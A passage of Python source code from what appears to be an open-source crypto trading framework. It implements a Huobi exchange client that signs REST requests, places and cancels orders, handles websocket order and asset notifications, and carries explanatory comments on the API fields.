return self._vector_length
else:
print(f"The vector length is not explicitly stated so we are inferring " + \
"from our test word - {self.test_word}.")
setattr(self, "_vector_length", len(self.encode(self.test_word)))
return self._vector_length
@vector_length.setter
def vector_length(self, value):
self._vector_length = value
@abstractmethod
def encode(self, words: Union[List[str]]):
pass
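# A subclass sketch showing how `vector_length` is inferred from `test_word` when it is not
# set explicitly (illustrative; `CharStats2Vec` is hypothetical, not a real vectorhub encoder):
#
#   class CharStats2Vec(BaseText2Vec):
#       def encode(self, word):
#           return [float(len(word)), float(word.count("a"))]
#
#   enc = CharStats2Vec()
#   print(enc.vector_length)   # 2, inferred by encoding the test word once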
|
quant/platform/huobi.py
|
vincent87lee/alphahunter
| 149 |
102986
|
# -*- coding:utf-8 -*-
"""
huobi Trade module.
https://huobiapi.github.io/docs/spot/v1/cn
Project: alphahunter
Author: HJQuant
Description: Asynchronous driven quantitative trading framework
"""
import json
import hmac
import copy
import gzip
import base64
import urllib
import hashlib
import datetime
from urllib import parse
from urllib.parse import urljoin
from collections import defaultdict, deque
from typing import DefaultDict, Deque, List, Dict, Tuple, Optional, Any
from quant.gateway import ExchangeGateway
from quant.state import State
from quant.utils import tools, logger
from quant.const import MARKET_TYPE_KLINE, INDICATE_ORDER, INDICATE_ASSET, INDICATE_POSITION
from quant.order import Order, Fill, SymbolInfo
from quant.position import Position
from quant.asset import Asset
from quant.tasks import SingleTask, LoopRunTask
from quant.utils.websocket import Websocket
from quant.utils.decorator import async_method_locker
from quant.utils.http_client import AsyncHttpRequests
from quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL
from quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET, ORDER_TYPE_IOC
from quant.order import LIQUIDITY_TYPE_MAKER, LIQUIDITY_TYPE_TAKER
from quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED
from quant.market import Kline, Orderbook, Trade, Ticker
from quant.trader import Trader
__all__ = ("HuobiRestAPI", "HuobiTrader", )
class HuobiRestAPI:
""" huobi REST API 封装
"""
def __init__(self, host, access_key, secret_key):
""" 初始化
@param host 请求host
@param access_key API KEY
@param secret_key SECRET KEY
"""
self._host = host
self._access_key = access_key
self._secret_key = secret_key
self._account_id = None
async def get_symbols_info(self):
""" 获取所有交易对基础信息
@return data list 所有交易对基础信息
"""
return await self.request("GET", "/v1/common/symbols")
async def get_server_time(self):
""" 获取服务器时间
@return data int 服务器时间戳(毫秒)
"""
return await self.request("GET", "/v1/common/timestamp")
async def get_user_accounts(self):
""" 获取账户信息
"""
return await self.request("GET", "/v1/account/accounts", auth=True)
async def get_account_id(self):
""" 获取账户id
"""
if self._account_id:
return self._account_id
success, error = await self.get_user_accounts()
if error:
return None
for item in success:
if item["type"] == "spot":
self._account_id = str(item["id"])
return self._account_id
return None
async def get_account_balance(self):
""" 获取账户信息
"""
account_id = await self.get_account_id()
uri = "/v1/account/accounts/{account_id}/balance".format(account_id=account_id)
return await self.request("GET", uri, auth=True)
async def get_balance_all(self):
""" 母账户查询其下所有子账户的各币种汇总余额
"""
return await self.request("GET", "/v1/subuser/aggregate-balance", auth=True)
async def create_order(self, symbol, price, quantity, order_type):
""" 创建订单
@param symbol 交易对
@param quantity 交易量
@param price 交易价格
@param order_type 订单类型 buy-market, sell-market, buy-limit, sell-limit
@return order_no 订单id
"""
account_id = await self.get_account_id()
info = {
"account-id": account_id,
"price": price,
"amount": quantity,
"source": "api",
"symbol": symbol,
"type": order_type
}
if order_type == "buy-market" or order_type == "sell-market":
info.pop("price")
return await self.request("POST", "/v1/order/orders/place", body=info, auth=True)
async def revoke_order(self, order_no):
""" 撤销委托单
@param order_no 订单id
@return True/False
"""
uri = "/v1/order/orders/{order_no}/submitcancel".format(order_no=order_no)
return await self.request("POST", uri, auth=True)
async def revoke_orders(self, order_nos):
""" 批量撤销委托单
@param order_nos 订单列表
* NOTE: 单次不超过50个订单id
"""
body = {
"order-ids": order_nos
}
return await self.request("POST", "/v1/order/orders/batchcancel", body=body, auth=True)
async def get_open_orders(self, symbol):
""" 获取当前还未完全成交的订单信息
@param symbol 交易对
* NOTE: 查询上限最多500个订单
"""
account_id = await self.get_account_id()
params = {
"account-id": account_id,
"symbol": symbol,
"size": 500
}
return await self.request("GET", "/v1/order/openOrders", params=params, auth=True)
async def get_order_status(self, order_no):
""" 获取订单的状态
@param order_no 订单id
"""
uri = "/v1/order/orders/{order_no}".format(order_no=order_no)
return await self.request("GET", uri, auth=True)
async def request(self, method, uri, params=None, body=None, auth=False):
""" 发起请求
@param method 请求方法 GET POST
@param uri 请求uri
@param params dict 请求query参数
@param body dict 请求body数据
"""
url = urljoin(self._host, uri)
params = params if params else {}
if auth:
timestamp = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
params.update({"AccessKeyId": self._access_key,
"SignatureMethod": "HmacSHA256",
"SignatureVersion": "2",
"Timestamp": timestamp})
host_name = urllib.parse.urlparse(self._host).hostname.lower()
params["Signature"] = self.generate_signature(method, params, host_name, uri)
if method == "GET":
headers = {
"Content-type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/39.0.2171.71 Safari/537.36"
}
else:
headers = {
"Accept": "application/json",
"Content-type": "application/json"
}
_, success, error = await AsyncHttpRequests.fetch(method, url, params=params, data=json.dumps(body), headers=headers, timeout=10)
if error:
return success, error
if success.get("status") != "ok":
return None, success
return success.get("data"), None
def generate_signature(self, method, params, host_url, request_path):
""" 创建签名
"""
query = "&".join(["{}={}".format(k, parse.quote(str(params[k]))) for k in sorted(params.keys())])
payload = [method, host_url, request_path, query]
payload = "\n".join(payload)
payload = payload.encode(encoding="utf8")
secret_key = self._secret_key.encode(encoding="utf8")
digest = hmac.new(secret_key, payload, digestmod=hashlib.sha256).digest()
signature = base64.b64encode(digest)
signature = signature.decode()
return signature
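# A self-contained sketch of the signing scheme implemented by generate_signature above
# (illustrative only; the key, host and parameters below are made up):
def _signature_sketch():
    import base64, hashlib, hmac
    from urllib import parse
    params = {"AccessKeyId": "demo-key", "SignatureMethod": "HmacSHA256",
              "SignatureVersion": "2", "Timestamp": "2020-01-01T00:00:00"}
    # sort the query parameters, then sign "METHOD\nhost\npath\nquery" with HMAC-SHA256 and base64-encode it
    query = "&".join("{}={}".format(k, parse.quote(str(params[k]))) for k in sorted(params))
    payload = "\n".join(["GET", "api.huobi.me", "/ws/v1", query]).encode("utf8")
    digest = hmac.new(b"demo-secret", payload, digestmod=hashlib.sha256).digest()
    return base64.b64encode(digest).decode()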
class HuobiTrader(Websocket, ExchangeGateway):
""" huobi Trade模块
"""
def __init__(self, **kwargs):
"""Initialize."""
self.cb = kwargs["cb"]
state = None
self._platform = kwargs.get("platform")
self._symbols = kwargs.get("symbols")
self._strategy = kwargs.get("strategy")
self._account = kwargs.get("account")
self._access_key = kwargs.get("access_key")
self._secret_key = kwargs.get("secret_key")
if not self._platform:
state = State(self._platform, self._account, "param platform miss")
elif self._account and (not self._access_key or not self._secret_key):
state = State(self._platform, self._account, "param access_key or secret_key miss")
elif not self._strategy:
state = State(self._platform, self._account, "param strategy miss")
elif not self._symbols:
state = State(self._platform, self._account, "param symbols miss")
if state:
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
return
self._host = "https://api.huobi.me"
self._wss = "wss://api.huobi.me"
url = self._wss + "/ws/v1"
super(HuobiTrader, self).__init__(url, send_hb_interval=0, **kwargs)
#self.heartbeat_msg = "ping"
# Initializing our REST API client.
self._rest_api = HuobiRestAPI(self._host, self._access_key, self._secret_key)
self._account_id = None
        self._syminfo: DefaultDict[str, Dict[str, Any]] = defaultdict(dict)
        self._orders: DefaultDict[str, Dict[str, Order]] = defaultdict(dict)
        #e.g. {"BTC": {"free": 1.1, "locked": 2.2, "total": 3.3}, ... }
        self._assets: DefaultDict[str, Dict[str, float]] = defaultdict(lambda: {k: 0.0 for k in {'free', 'locked', 'total'}})
"""
        Two kinds of order-update channels can be subscribed to: a new style and an old style.
        New style:
            Pros: low latency (about 100 ms), messages arrive in order and are not lost.
            Cons: messages are not self-contained; the program must maintain context state itself to recover the full order information.
        Old style:
            Pros: messages are self-contained; the program does not need to maintain context state.
            Cons: high latency (about 270 ms), messages may arrive out of order and may be lost (e.g. when the service restarts).
"""
        self._use_old_style_order_channel = False  # subscribe with the new style by default
        self._pending_order_infos = []  # the return of the create-order call and the order websocket notification may arrive in either order, so this buffer is used to assemble a complete order notification for the upper-layer strategy
self._order_channel = []
for sym in self._symbols:
if self._use_old_style_order_channel:
self._order_channel.append("orders.{}".format(sym))
else:
self._order_channel.append("orders.{}.update".format(sym))
if self._account != None:
self.initialize()
        #if all four market-data callbacks are empty, there is no need to run any market-data related code at all
if (self.cb.on_kline_update_callback or
self.cb.on_orderbook_update_callback or
self.cb.on_trade_update_callback or
self.cb.on_ticker_update_callback):
            #market data
HuobiMarket(**kwargs)
async def create_order(self, symbol, action, price, quantity, order_type=ORDER_TYPE_LIMIT):
""" 创建订单
@param symbol 交易对
@param action 交易方向 BUY / SELL
@param price 委托价格
@param quantity 委托数量
@param order_type 委托类型 LIMIT / MARKET
"""
if action == ORDER_ACTION_BUY:
if order_type == ORDER_TYPE_LIMIT:
t = "buy-limit"
elif order_type == ORDER_TYPE_MARKET:
t = "buy-market"
elif order_type == ORDER_TYPE_IOC:
t = "buy-ioc"
else:
logger.error("order_type error! order_type:", order_type, caller=self)
return None, "order type error"
elif action == ORDER_ACTION_SELL:
if order_type == ORDER_TYPE_LIMIT:
t = "sell-limit"
elif order_type == ORDER_TYPE_MARKET:
t = "sell-market"
elif order_type == ORDER_TYPE_IOC:
t = "sell-ioc"
else:
logger.error("order_type error! order_type:", order_type, caller=self)
return None, "order type error"
else:
logger.error("action error! action:", action, caller=self)
return None, "action error"
price = tools.float_to_str(price)
quantity = tools.float_to_str(quantity)
result, error = await self._rest_api.create_order(symbol, price, quantity, t)
#=====================================================
        #are we subscribed to the new-style order update channel?
if not self._use_old_style_order_channel:
            #if the order was placed successfully, cache the new order
if error == None:
order_no = result
tm = tools.get_cur_timestamp_ms()
o = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"order_no": order_no,
"action": action,
"symbol": symbol,
"price": float(price),
"quantity": float(quantity),
"remain": float(quantity),
"status": ORDER_STATUS_SUBMITTED,
"order_type": order_type,
"ctime": tm,
"utime": tm
#avg_price
}
order = Order(**o)
self._orders[symbol][order_no] = order
                #if the order id returned by create_order already exists in _pending_order_infos, the websocket notification arrived before the create-order call returned
msgs = [i for i in self._pending_order_infos if (i["data"]["symbol"]==order.symbol and str(i["data"]["order-id"])==order.order_no)]
if len(msgs) >= 1:
msg = msgs[0]
                    self._update_order_and_fill(msg)  # effectively re-run the update, because the previous attempt in the websocket callback could not complete (see the surrounding logic)
                    self._pending_order_infos.remove(msg)  # drop the already-processed order data from _pending_order_infos
#=====================================================
return result, error
async def revoke_order(self, symbol, *order_nos):
""" 撤销订单
@param symbol 交易对
@param order_nos 订单号列表,可传入任意多个,如果不传入,那么就撤销所有订单
备注:关于批量删除订单函数返回值格式,如果函数调用失败了那肯定是return None, error
如果函数调用成功,但是多个订单有成功有失败的情况,比如输入3个订单id,成功2个,失败1个,那么
返回值统一都类似:
return [(成功订单ID, None),(成功订单ID, None),(失败订单ID, "失败原因")], None
"""
        # if order_nos is empty, cancel all open orders
if len(order_nos) == 0:
orders, error = await self.get_orders(symbol)
if error:
return [], error
if not orders:
return [], None
order_nos = [o.order_no for o in orders]
        # if a single order id is passed, cancel just that order
if len(order_nos) == 1:
success, error = await self._rest_api.revoke_order(order_nos[0])
if error:
return order_nos[0], error
else:
return order_nos[0], None
        # if more than one order id is passed, cancel them in one batch
if len(order_nos) > 1:
"""
{
"status": "ok",
"data": {
"success": [
"5983466"
],
"failed": [
{
"err-msg": "Incorrect order state",
"order-state": 7,
"order-id": "",
"err-code": "order-orderstate-error",
"client-order-id": "first"
},
{
"err-msg": "The record is not found.",
"order-id": "",
"err-code": "base-not-found",
"client-order-id": "second"
}
]
}
}
"""
s, e = await self._rest_api.revoke_orders(order_nos)
if e:
return [], e
result = []
for x in s["success"]:
result.append((x, None))
for x in s["failed"]:
result.append((x["order-id"], x["err-msg"]))
return result, None
async def get_orders(self, symbol):
""" 获取当前挂单列表
Args:
symbol: Trade target
Returns:
orders: Order list if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
#{"status": "ok", "data": [{"filled-cash-amount": "0.0", "filled-fees": "0.0", "filled-amount": "0.0", "symbol": "trxeth", "source": "web", "created-at": 1575100309209, "amount": "17.000000000000000000", "account-id": 11261082, "price": "0.000100000000000000", "id": 58040174635, "state": "submitted", "type": "buy-limit"}, {"filled-cash-amount": "0.0", "filled-fees": "0.0", "filled-amount": "0.0", "symbol": "trxeth", "source": "web", "created-at": 1575018429010, "amount": "10.000000000000000000", "account-id": 11261082, "price": "0.000100000000000000", "id": 57906933472, "state": "submitted", "type": "buy-limit"}]}
success, error = await self._rest_api.get_open_orders(symbol)
if error:
return None, error
else:
orders:List[Order] = []
for order_info in success:
order = self._convert_order_format(order_info)
orders.append(order)
return orders, None
async def get_assets(self):
""" 获取交易账户资产信息
Args:
None
Returns:
assets: Asset if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
#{"status": "ok", "data": {"id": 11261082, "type": "spot", "state": "working", "list": [{"currency": "lun", "type": "trade", "balance": "0"}, {"currency": "lun", "type": "frozen", "balance": "0"}]}}
success, error = await self._rest_api.get_account_balance()
if error:
return None, error
        assets: DefaultDict[str, Dict[str, float]] = defaultdict(lambda: {k: 0.0 for k in {'free', 'locked', 'total'}})
for d in success["list"]:
b = d["balance"]
if b == "0": continue
c = d["currency"]
t = d["type"]
if t == "trade":
assets[c]["free"] = float(b)
elif t == "frozen":
assets[c]["locked"] = float(b)
for (_, v) in assets.items():
v["total"] = v["free"] + v["locked"]
ast = Asset(self._platform, self._account, assets, tools.get_cur_timestamp_ms(), True)
return ast, None
async def get_position(self, symbol):
""" 获取当前持仓
Args:
symbol: Trade target
Returns:
position: Position if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
raise NotImplementedError
async def get_symbol_info(self, symbol):
""" 获取指定符号相关信息
Args:
symbol: Trade target
Returns:
symbol_info: SymbolInfo if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
"""
[{
symbol-partition = "main", #交易区,可能值: [main,innovation]
symbol = "trxeth", #交易对
state = "online", #交易对状态;可能值: [online,offline,suspend] online - 已上线;offline - 交易对已下线,不可交易;suspend -- 交易暂停
base-currency = "trx", #交易对中的基础币种
quote-currency = "eth", #交易对中的报价币种
price-precision = 8, #交易对报价的精度(小数点后位数)
amount-precision = 2, #交易对基础币种计数精度(小数点后位数)
value-precision = 8, #交易对交易金额的精度(小数点后位数)
min-order-amt = 1, #交易对最小下单量 (下单量指当订单类型为限价单或sell-market时,下单接口传的'amount')
max-order-amt = 10000000, #交易对最大下单量
min-order-value = 0.001, #最小下单金额 (下单金额指当订单类型为限价单时,下单接口传入的(amount * price)。当订单类型为buy-market时,下单接口传的'amount')
#"leverage-ratio":4 #交易对杠杆最大倍数(杠杆交易才有这个字段)
},]
"""
info = self._syminfo[symbol]
if not info:
return None, "Symbol not exist"
price_tick = 1/float(10**info["price-precision"])
size_tick = 1/float(10**info["amount-precision"])
size_limit = info["min-order-amt"]
value_tick = 1/float(10**info["value-precision"])
value_limit = info["min-order-value"]
base_currency = info["base-currency"]
quote_currency = info["quote-currency"]
settlement_currency = info["quote-currency"]
symbol_type = "spot"
is_inverse = False
multiplier = 1
syminfo = SymbolInfo(self._platform, symbol, price_tick, size_tick, size_limit, value_tick, value_limit, base_currency, quote_currency, settlement_currency, symbol_type, is_inverse, multiplier)
return syminfo, None
async def invalid_indicate(self, symbol, indicate_type):
""" update (an) callback function.
Args:
symbol: Trade target
indicate_type: INDICATE_ORDER, INDICATE_ASSET, INDICATE_POSITION
Returns:
success: If execute successfully, return True, otherwise it's False.
error: If execute failed, return error information, otherwise it's None.
"""
async def _task():
if indicate_type == INDICATE_ORDER and self.cb.on_order_update_callback:
success, error = await self.get_orders(symbol)
if error:
state = State(self._platform, self._account, "get_orders error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
return
for order in success:
SingleTask.run(self.cb.on_order_update_callback, order)
elif indicate_type == INDICATE_ASSET and self.cb.on_asset_update_callback:
success, error = await self.get_assets()
if error:
state = State(self._platform, self._account, "get_assets error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
return
SingleTask.run(self.cb.on_asset_update_callback, success)
if indicate_type == INDICATE_ORDER or indicate_type == INDICATE_ASSET:
SingleTask.run(_task)
return True, None
elif indicate_type == INDICATE_POSITION:
raise NotImplementedError
else:
logger.error("indicate_type error! indicate_type:", indicate_type, caller=self)
return False, "indicate_type error"
@property
def rest_api(self):
return self._rest_api
async def connected_callback(self):
""" 建立连接之后,授权登陆,然后订阅相关频道等
"""
        #authenticate first, then subscribe to the private channels that require login
timestamp = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
params = {
"AccessKeyId": self._access_key,
"SignatureMethod": "HmacSHA256",
"SignatureVersion": "2",
"Timestamp": timestamp
}
signature = self._rest_api.generate_signature("GET", params, "api.huobi.me", "/ws/v1")
params["op"] = "auth"
params["Signature"] = signature
await self.send_json(params)
async def _auth_success_callback(self):
""" 授权成功之后回调
"""
#获取现货账户ID
self._account_id = await self._rest_api.get_account_id()
if self._account_id == None:
state = State(self._platform, self._account, "get_account_id error", State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
            #an error occurred during initialization, close the connection to trigger the reconnect mechanism
await self.socket_close()
return
        #get the symbol information
success, error = await self._rest_api.get_symbols_info()
if error:
state = State(self._platform, self._account, "get_symbols_info error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
            #an error occurred during initialization, close the connection to trigger the reconnect mechanism
await self.socket_close()
return
for info in success:
self._syminfo[info["symbol"]] = info #符号信息一般不变,获取一次保存好,其他地方要用直接从这个变量获取就可以了
        #get the account balance and update assets
#{"status": "ok", "data": {"id": 11261082, "type": "spot", "state": "working", "list": [{"currency": "lun", "type": "trade", "balance": "0"}, {"currency": "lun", "type": "frozen", "balance": "0"}]}}
success, error = await self._rest_api.get_account_balance()
if error:
state = State(self._platform, self._account, "get_account_balance error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
# An error occurred during initialization, so close the connection to trigger the reconnect mechanism.
await self.socket_close()
return
for d in success["list"]:
b = d["balance"]
if b == "0": continue
c = d["currency"]
t = d["type"]
if t == "trade":
self._assets[c]["free"] = float(b)
#elif t == "frozen":
# self._assets[c]["locked"] = b
ast = Asset(self._platform, self._account, self._assets, tools.get_cur_timestamp_ms(), True)
if self.cb.on_asset_update_callback:
SingleTask.run(self.cb.on_asset_update_callback, ast)
# Fetch the currently open (unfilled) orders.
for sym in self._symbols:
success, error = await self.get_orders(sym)
if error:
state = State(self._platform, self._account, "get_orders error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
# An error occurred during initialization, so close the connection to trigger the reconnect mechanism.
await self.socket_close()
return
for order in success:
# Cache the order only when the new-style order update channel is used.
if not self._use_old_style_order_channel:
self._orders[sym][order.order_no] = order
if self.cb.on_order_update_callback:
SingleTask.run(self.cb.on_order_update_callback, order)
# Subscribe to account asset updates.
if self.cb.on_asset_update_callback:
params = {
"op": "sub",
"topic": "accounts",
"model": "0"
}
await self.send_json(params)
# Subscribe to the order update channels.
if self.cb.on_order_update_callback or self.cb.on_fill_update_callback:
for ch in self._order_channel:
params = {
"op": "sub",
"topic": ch
}
await self.send_json(params)
# Reset the subscription-response counter to zero.
self._subscribe_response_count = 0
async def process_binary(self, raw):
""" 处理websocket上接收到的消息
@param raw 原始的压缩数据
"""
#{'op': 'error', 'ts': 1575003013045, 'err-code': 1002, 'err-msg': 'internal error : auth not received.'}
#{'op': 'close', 'ts': 1575003013045}
#{'op': 'auth', 'ts': 1575003739511, 'err-code': 0, 'data': {'user-id': 12053842}}
#{'op': 'ping', 'ts': 1575003876880}
#{'op': 'sub', 'ts': 1575003877414, 'topic': 'orders.eoseth.update', 'err-code': 0}
#{'op': 'sub', 'ts': 1575003882668, 'topic': 'orders.trxeth.update', 'err-code': 0}
#{'op': 'sub', 'ts': 1575003888499, 'topic': 'accounts', 'err-code': 0
#== Order creation:
#{'op': 'notify', 'ts': 1575004328706, 'topic': 'accounts', 'data': {'event': 'order.place', 'list': [{'account-id': 10432498, 'currency': 'eth', 'type': 'trade', 'balance': '0.71662865'}]}}
#{'op': 'notify', 'ts': 1575004328733, 'topic': 'orders.trxeth.update', 'data': {'role': 'taker', 'match-id': 100413368307, 'filled-cash-amount': '0', 'filled-amount': '0', 'price': '0.0001', 'order-id': 57886011451, 'client-order-id': '', 'order-type': 'buy-limit', 'unfilled-amount': '10', 'symbol': 'trxeth', 'order-state': 'submitted'}}
#== Order cancellation:
#{'op': 'notify', 'ts': 1575004686930, 'topic': 'orders.trxeth.update', 'data': {'role': 'taker', 'match-id': 100413372769, 'filled-cash-amount': '0', 'filled-amount': '0', 'price': '0.0001', 'order-id': 57886011451, 'client-order-id': '', 'order-type': 'buy-limit', 'unfilled-amount': '10', 'symbol': 'trxeth', 'order-state': 'canceled'}}
#{'op': 'notify', 'ts': 1575004687037, 'topic': 'accounts', 'data': {'event': 'order.cancel', 'list': [{'account-id': 10432498, 'currency': 'eth', 'type': 'trade', 'balance': '0.71762865'}]}}
msg = json.loads(gzip.decompress(raw).decode())
logger.debug("msg:", msg, caller=self)
op = msg.get("op")
if op == "auth": # 授权
if msg["err-code"] != 0:
state = State(self._platform, self._account, "Websocket connection authorized failed: {}".format(msg), State.STATE_CODE_GENERAL_ERROR)
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
return
logger.info("Websocket connection authorized successfully.", caller=self)
await self._auth_success_callback()
elif op == "error": # error
state = State(self._platform, self._account, "Websocket error: {}".format(msg), State.STATE_CODE_GENERAL_ERROR)
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
elif op == "close": # close
return
elif op == "ping": # ping
params = {
"op": "pong",
"ts": msg["ts"]
}
await self.send_json(params)
elif op == "sub": # 返回订阅操作是否成功
exist = False
for ch in self._order_channel:
if msg["topic"] == ch:
exist = True
break
if msg["topic"] == "accounts":
exist = True
if not exist:
return
if msg["err-code"] == 0:
self._subscribe_response_count = self._subscribe_response_count + 1  # Increment for every subscription response received.
count = len(self._order_channel) + 1  # The total number of subscription responses expected.
if self._subscribe_response_count == count:  # All subscriptions succeeded, so notify the upper layer that everything is ready.
state = State(self._platform, self._account, "Environment ready", State.STATE_CODE_READY)
SingleTask.run(self.cb.on_state_update_callback, state)
else:
state = State(self._platform, self._account, "subscribe event error: {}".format(msg), State.STATE_CODE_GENERAL_ERROR)
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
elif op == "notify": # 频道更新通知
if msg["topic"] == "accounts":
self._update_asset(msg)
else:
for ch in self._order_channel:
if msg["topic"] == ch:
if self._use_old_style_order_channel:
self._update_order_and_fill_old_style(msg)
else:
self._update_order_and_fill(msg)
break
def _convert_order_format(self, order_info):
symbol = order_info["symbol"]
order_no = str(order_info["id"])
remain = float(order_info["amount"]) - float(order_info["filled-amount"])
action = ORDER_ACTION_BUY if order_info["type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
if order_info["type"] in ["buy-market", "sell-market"]:
order_type = ORDER_TYPE_MARKET
elif order_info["type"] in ["buy-ioc", "sell-ioc"]:
order_type = ORDER_TYPE_IOC
else:
order_type = ORDER_TYPE_LIMIT
ctime = order_info["created-at"]
utime = order_info["created-at"]
state = order_info["state"]
if state == "canceled":
status = ORDER_STATUS_CANCELED
elif state == "partial-canceled":
status = ORDER_STATUS_CANCELED
elif state == "created":
status = ORDER_STATUS_SUBMITTED
elif state == "submitting":
status = ORDER_STATUS_SUBMITTED
elif state == "submitted":
status = ORDER_STATUS_SUBMITTED
elif state == "partical-filled":
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
else:
logger.error("status error! order_info:", order_info, caller=self)
status = ORDER_STATUS_NONE
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"order_no": order_no,
"action": action,
"symbol": symbol,
"price": float(order_info["price"]),
"quantity": float(order_info["amount"]),
"remain": remain,
"status": status,
"order_type": order_type,
"ctime": ctime,
"utime": utime
#avg_price
}
return Order(**info)
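# Added note (commentary, not in the original source): the Huobi order "state" strings map onto
# the framework's order status constants as follows; the same mapping is repeated in the
# websocket handlers below.
#
#   created / submitting / submitted  -> ORDER_STATUS_SUBMITTED
#   partial-filled                    -> ORDER_STATUS_PARTIAL_FILLED
#   filled                            -> ORDER_STATUS_FILLED
#   canceled / partial-canceled       -> ORDER_STATUS_CANCELED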
def _update_fill(self, order_info, ctime):
"""处理成交通知
"""
symbol = order_info["symbol"]
order_no = str(order_info["order-id"])
fill_no = str(order_info["match-id"])
price = float(order_info["price"]) #成交价格
size = float(order_info["filled-amount"]) #成交数量
side = ORDER_ACTION_BUY if order_info["order-type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
liquidity = LIQUIDITY_TYPE_TAKER if order_info["role"]=="taker" else LIQUIDITY_TYPE_MAKER
f = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"fill_no": fill_no,
"order_no": order_no,
"side": side, #成交方向,买还是卖
"symbol": symbol,
"price": price, #成交价格
"quantity": size, #成交数量
"liquidity": liquidity, #maker成交还是taker成交
#"fee": fee, #通知里没提供,所以只能注释,或者也可以自己算
"ctime": ctime
}
fill = Fill(**f)
if self.cb.on_fill_update_callback:
SingleTask.run(self.cb.on_fill_update_callback, fill)
def _update_order_and_fill(self, msg):
"""
{
'op': 'notify',
'ts': 1575004328733,
'topic': 'orders.trxeth.update',
'data': {
'role': 'taker',  # Role of the latest trade. When order-state = submitted, canceled or partial-canceled, role defaults to taker; when order-state = filled or partial-filled, role is taker or maker.
'match-id': 100413368307,  # Latest match ID. When order-state = submitted, canceled or partial-canceled, match-id is the message sequence number; when order-state = filled or partial-filled, match-id is the latest match ID.
'filled-cash-amount': '0',  # Latest filled cash amount.
'filled-amount': '0',  # Latest filled quantity.
'price': '0.0001',  # Latest price. When order-state = submitted, price is the order price; when order-state = canceled or partial-canceled, price is zero; when order-state = filled or partial-filled, price is the latest trade price.
'order-id': 57886011451,  # Order ID.
'client-order-id': '',  # Client-defined order ID.
'order-type': 'buy-limit',  # Order type, one of buy-market, sell-market, buy-limit, sell-limit, buy-ioc, sell-ioc, buy-limit-maker, sell-limit-maker, buy-stop-limit, sell-stop-limit.
'unfilled-amount': '10',  # Latest unfilled quantity. When order-state = submitted it is the original order size; when order-state = canceled or partial-canceled it is the unfilled quantity; when order-state = filled it is zero (or a tiny residual for buy-market orders); when order-state = partial-filled it is the remaining unfilled quantity.
'symbol': 'trxeth',  # Trading symbol.
'order-state': 'submitted'  # Order state; valid values: submitted, partial-filled, filled, canceled, partial-canceled.
}
}
"""
order_info = msg["data"]
state = order_info["order-state"]
if state == "canceled":
status = ORDER_STATUS_CANCELED
elif state == "partial-canceled":
status = ORDER_STATUS_CANCELED
elif state == "created":
status = ORDER_STATUS_SUBMITTED
elif state == "submitting":
status = ORDER_STATUS_SUBMITTED
elif state == "submitted":
status = ORDER_STATUS_SUBMITTED
elif state == "partical-filled":
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
else:
logger.error("status error! order_info:", order_info, caller=self)
return
symbol = order_info["symbol"]
order_no = str(order_info["order-id"])
action = ORDER_ACTION_BUY if order_info["order-type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
if order_info["order-type"] in ["buy-market", "sell-market"]:
order_type = ORDER_TYPE_MARKET
elif order_info["order-type"] in ["buy-ioc", "sell-ioc"]:
order_type = ORDER_TYPE_IOC
else:
order_type = ORDER_TYPE_LIMIT
#tm = msg["ts"]
tm = tools.get_cur_timestamp_ms()
order = self._orders[symbol].get(order_no)
if order is None:
# Reaching here usually means one of a few things: the order was placed on the web site, or our own strategy placed it but the websocket notification arrived before the order-placing call returned.
# Either way, keep only the 10 most recent pending order notifications: drop the oldest when the limit is exceeded and store the newest.
if len(self._pending_order_infos) > 10:
self._pending_order_infos.pop()  # Remove the last (oldest) element of the list.
self._pending_order_infos.insert(0, msg)  # Put the newest message at the front of the list.
return  # Ignore order notifications that are not in the local cache.
if action == ORDER_ACTION_BUY and order_type == ORDER_TYPE_MARKET:
order.remain = order.quantity - float(order_info["filled-cash-amount"]) #市价买单传入的是金额,输出的也要是金额
else:
order.remain = float(order_info["unfilled-amount"])
order.status = status
order.utime = tm
if self.cb.on_order_update_callback:
SingleTask.run(self.cb.on_order_update_callback, order)
if status in [ORDER_STATUS_CANCELED, ORDER_STATUS_FILLED]:
self._orders[symbol].pop(order_no)  # The order is finished, so remove it from the cache.
# If this is a fill notification, handle the fill callback.
